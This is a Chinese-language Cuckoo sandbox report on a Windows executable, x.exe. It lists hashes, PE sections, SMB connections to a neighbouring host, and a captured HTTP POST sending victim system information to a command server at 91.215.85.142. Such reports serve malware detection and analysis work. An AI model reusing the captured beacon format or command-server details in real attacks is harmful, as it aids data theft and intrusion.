分析类型 | 虚拟机标签 | 开始时间 | 结束时间 | 持续时间 |
---|---|---|---|---|
文件 (Windows) | win7-sp1-x64-shaapp02-2 | 2024-04-18 10:32:01 | 2024-04-18 10:34:13 | 132 秒 |
文件名 | x.exe |
---|---|
文件大小 | 489984 字节 |
文件类型 | PE32+ executable (GUI) x86-64, for MS Windows |
MD5 | 9f908f344ec041cc1ebe5324da2cf183 |
SHA1 | ec06c0d4c38acdd61e2bf940ae70b98a4661a08a |
SHA256 | 2f5fac1ababd213d8010eda9ccb5320f25fd0f2e95bb86154bf7e8bcad6fc4dc |
SHA512 | 494d4184e6e31af9b5dc04fcd807456899f789069b487e7a7e56b2d9dbba2f47427b1c477ceab454713a1b380d155fe1396ddc9d93e966755941668588d16c17 |
CRC32 | AD51AAFC |
Ssdeep | 6144:20wmbI4/D4SHvrxw6zaIST1w9wEPDasWxxsBhS37b8o6XCFyPwCMa6ynkxq/y:Vzv66zaISTW9asWxxAh4IlXC4PUyMq/ |
Yara | 登录查看Yara规则 |
找不到该样本 提交误报 |
直接 | IP | 安全评级 | 地理位置 |
---|---|---|---|
否 | 104.26.13.205 | 美国 | |
是 | 91.215.85.142 | 俄罗斯 |
域名 | 安全评级 | 响应 |
---|---|---|
api.ipify.org |
A 104.26.13.205 A 172.67.74.152 A 104.26.12.205 |
初始地址 | 0x140000000 |
---|---|
入口地址 | 0x14002cbe4 |
声明校验值 | 0x00000000 |
实际校验值 | 0x00080cb7 |
最低操作系统版本要求 | 6.0 |
编译时间 | 2024-03-11 11:22:35 |
载入哈希 | cbe53f46121d600d26965890ee97a94a |
名称 | 虚拟地址 | 虚拟大小 | 原始数据大小 | 特征 | 熵(Entropy) |
---|---|---|---|---|---|
.text | 0x00001000 | 0x000515e0 | 0x00051600 | IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ | 6.57 |
.rdata | 0x00053000 | 0x0001f2a6 | 0x0001f400 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 5.06 |
.data | 0x00073000 | 0x00008644 | 0x00001c00 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE | 3.49 |
.pdata | 0x0007c000 | 0x00003b28 | 0x00003c00 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 5.68 |
_RDATA | 0x00080000 | 0x000001f4 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 4.20 |
.reloc | 0x00081000 | 0x0000102c | 0x00001200 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ | 5.22 |
直接 | IP | 安全评级 | 地理位置 |
---|---|---|---|
否 | 104.26.13.205 | 美国 | |
是 | 91.215.85.142 | 俄罗斯 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.202 | 49166 | 104.26.13.205 api.ipify.org | 80 |
192.168.122.202 | 49181 | 192.168.122.201 | 445 |
192.168.122.202 | 49182 | 192.168.122.201 | 445 |
192.168.122.202 | 49183 | 192.168.122.201 | 445 |
192.168.122.202 | 49184 | 192.168.122.201 | 445 |
192.168.122.202 | 49185 | 192.168.122.201 | 445 |
192.168.122.202 | 49186 | 192.168.122.201 | 445 |
192.168.122.202 | 49187 | 192.168.122.201 | 445 |
192.168.122.202 | 49188 | 192.168.122.201 | 445 |
192.168.122.202 | 49189 | 192.168.122.201 | 445 |
192.168.122.202 | 49190 | 192.168.122.201 | 445 |
192.168.122.202 | 49191 | 192.168.122.201 | 445 |
192.168.122.202 | 49192 | 192.168.122.201 | 445 |
192.168.122.202 | 49193 | 192.168.122.201 | 445 |
192.168.122.202 | 49194 | 192.168.122.201 | 135 |
192.168.122.202 | 49195 | 192.168.122.201 | 49156 |
192.168.122.202 | 49196 | 192.168.122.201 | 445 |
192.168.122.202 | 49197 | 192.168.122.201 | 445 |
192.168.122.202 | 49198 | 192.168.122.201 | 445 |
192.168.122.202 | 49199 | 192.168.122.201 | 445 |
192.168.122.202 | 49200 | 192.168.122.201 | 445 |
192.168.122.202 | 49201 | 192.168.122.201 | 445 |
192.168.122.202 | 49202 | 192.168.122.201 | 445 |
192.168.122.202 | 49203 | 192.168.122.201 | 445 |
192.168.122.202 | 49204 | 192.168.122.201 | 445 |
192.168.122.202 | 49205 | 192.168.122.201 | 445 |
192.168.122.202 | 49206 | 192.168.122.201 | 445 |
192.168.122.202 | 49207 | 192.168.122.201 | 445 |
192.168.122.202 | 49208 | 192.168.122.201 | 445 |
192.168.122.202 | 49209 | 192.168.122.201 | 445 |
192.168.122.202 | 49210 | 192.168.122.201 | 445 |
192.168.122.202 | 49211 | 192.168.122.201 | 445 |
192.168.122.202 | 49212 | 192.168.122.201 | 49156 |
192.168.122.202 | 49213 | 192.168.122.201 | 445 |
192.168.122.202 | 49215 | 192.168.122.201 | 445 |
192.168.122.202 | 49157 | 23.206.229.110 | 80 |
192.168.122.202 | 49167 | 91.215.85.142 | 80 |
192.168.122.202 | 49170 | 91.215.85.142 | 80 |
192.168.122.202 | 49179 | 91.215.85.142 | 80 |
192.168.122.202 | 49214 | 91.215.85.142 | 80 |
192.168.122.202 | 49219 | 91.215.85.142 | 80 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.202 | 60917 | 192.168.122.1 | 53 |
192.168.122.202 | 63030 | 192.168.122.1 | 53 |
域名 | 安全评级 | 响应 |
---|---|---|
api.ipify.org |
A 104.26.13.205 A 172.67.74.152 A 104.26.12.205 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.202 | 49166 | 104.26.13.205 api.ipify.org | 80 |
192.168.122.202 | 49181 | 192.168.122.201 | 445 |
192.168.122.202 | 49182 | 192.168.122.201 | 445 |
192.168.122.202 | 49183 | 192.168.122.201 | 445 |
192.168.122.202 | 49184 | 192.168.122.201 | 445 |
192.168.122.202 | 49185 | 192.168.122.201 | 445 |
192.168.122.202 | 49186 | 192.168.122.201 | 445 |
192.168.122.202 | 49187 | 192.168.122.201 | 445 |
192.168.122.202 | 49188 | 192.168.122.201 | 445 |
192.168.122.202 | 49189 | 192.168.122.201 | 445 |
192.168.122.202 | 49190 | 192.168.122.201 | 445 |
192.168.122.202 | 49191 | 192.168.122.201 | 445 |
192.168.122.202 | 49192 | 192.168.122.201 | 445 |
192.168.122.202 | 49193 | 192.168.122.201 | 445 |
192.168.122.202 | 49194 | 192.168.122.201 | 135 |
192.168.122.202 | 49195 | 192.168.122.201 | 49156 |
192.168.122.202 | 49196 | 192.168.122.201 | 445 |
192.168.122.202 | 49197 | 192.168.122.201 | 445 |
192.168.122.202 | 49198 | 192.168.122.201 | 445 |
192.168.122.202 | 49199 | 192.168.122.201 | 445 |
192.168.122.202 | 49200 | 192.168.122.201 | 445 |
192.168.122.202 | 49201 | 192.168.122.201 | 445 |
192.168.122.202 | 49202 | 192.168.122.201 | 445 |
192.168.122.202 | 49203 | 192.168.122.201 | 445 |
192.168.122.202 | 49204 | 192.168.122.201 | 445 |
192.168.122.202 | 49205 | 192.168.122.201 | 445 |
192.168.122.202 | 49206 | 192.168.122.201 | 445 |
192.168.122.202 | 49207 | 192.168.122.201 | 445 |
192.168.122.202 | 49208 | 192.168.122.201 | 445 |
192.168.122.202 | 49209 | 192.168.122.201 | 445 |
192.168.122.202 | 49210 | 192.168.122.201 | 445 |
192.168.122.202 | 49211 | 192.168.122.201 | 445 |
192.168.122.202 | 49212 | 192.168.122.201 | 49156 |
192.168.122.202 | 49213 | 192.168.122.201 | 445 |
192.168.122.202 | 49215 | 192.168.122.201 | 445 |
192.168.122.202 | 49157 | 23.206.229.110 | 80 |
192.168.122.202 | 49167 | 91.215.85.142 | 80 |
192.168.122.202 | 49170 | 91.215.85.142 | 80 |
192.168.122.202 | 49179 | 91.215.85.142 | 80 |
192.168.122.202 | 49214 | 91.215.85.142 | 80 |
192.168.122.202 | 49219 | 91.215.85.142 | 80 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.202 | 60917 | 192.168.122.1 | 53 |
192.168.122.202 | 63030 | 192.168.122.1 | 53 |
URI | HTTP数据 |
---|---|
URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip | GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1 Accept: */* If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT User-Agent: IPM Host: acroipm.adobe.com Connection: Keep-Alive Cache-Control: no-cache |
URL专业沙箱检测 -> http://api.ipify.org/ | GET / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.ipify.org Connection: Keep-Alive Cache-Control: no-cache |
URL专业沙箱检测 -> http://91.215.85.142/QWEwqdsvsf/ap.php | POST /QWEwqdsvsf/ap.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.215.85.142 Content-Length: 164 Connection: Keep-Alive Cache-Control: no-cache user=hiervos&TargetID=FB3A2FFF081DFC7778C92B2A&SystemInformation=Windows%207%20Ultimate%20x64,%20CN,%20114.80.207.43,%20TEST-PC&max_size_of_file=0.0&size_of_hdd=460 |
无SMTP流量.
无IRC请求.
源地址 | 目标地址 | ICMP类型 | 数据 |
---|---|---|---|
192.168.122.1 | 192.168.122.202 | 3 | |
192.168.122.1 | 192.168.122.202 | 3 | |
192.168.122.1 | 192.168.122.202 | 3 | |
192.168.122.202 | 224.0.0.22 | 8 | ABCDEFGHIJKLMNOPQRSTUVWABCDEFGHI |
192.168.122.202 | 224.0.0.22 | 8 | ABCDEFGHIJKLMNOPQRSTUVWABCDEFGHI |
无 CIF 结果
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Signature | Category |
---|---|---|---|---|---|---|---|---|
2024-04-18 10:33:01.716817+0800 | 192.168.122.202 | 49183 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:04.704922+0800 | 192.168.122.202 | 49189 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:01.975674+0800 | 192.168.122.202 | 49184 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:02.426289+0800 | 192.168.122.202 | 49186 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:07.204955+0800 | 192.168.122.202 | 49201 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:07.575738+0800 | 192.168.122.202 | 49203 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:06.080198+0800 | 192.168.122.202 | 49196 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:09.491075+0800 | 192.168.122.202 | 49206 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:01.102959+0800 | 192.168.122.202 | 49181 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:03.369152+0800 | 192.168.122.202 | 49188 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:07.013350+0800 | 192.168.122.202 | 49199 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:01.586296+0800 | 192.168.122.202 | 49182 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:09.772515+0800 | 192.168.122.202 | 49209 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:05.015223+0800 | 192.168.122.202 | 49191 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:04.997937+0800 | 192.168.122.202 | 49190 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:05.210320+0800 | 192.168.122.202 | 49193 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:07.117725+0800 | 192.168.122.202 | 49200 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:07.309359+0800 | 192.168.122.202 | 49202 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:08.420670+0800 | 192.168.122.202 | 49205 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:09.853009+0800 | 192.168.122.202 | 49210 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:10.244043+0800 | 192.168.122.202 | 49213 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:02.726840+0800 | 192.168.122.202 | 49187 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:06.390982+0800 | 192.168.122.202 | 49197 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:09.665136+0800 | 192.168.122.202 | 49207 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:06.805403+0800 | 192.168.122.202 | 49198 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:09.761679+0800 | 192.168.122.202 | 49208 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:10.617587+0800 | 192.168.122.202 | 49215 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:32:37.437111+0800 | 192.168.122.202 | 49166 | 104.26.13.205 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
2024-04-18 10:33:05.106567+0800 | 192.168.122.202 | 49192 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:07.806057+0800 | 192.168.122.202 | 49204 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:02.144656+0800 | 192.168.122.202 | 49185 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2024-04-18 10:33:09.860449+0800 | 192.168.122.202 | 49211 | 192.168.122.201 | 445 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
No TLS
No Suricata HTTP
HTML 总结报告 (需15-60分钟同步) |
下载 |
---|
Task ID | 744066 |
---|---|
Mongo ID | 6620874cdc327b6545622f87 |
Cuckoo release | 1.4-Maldun |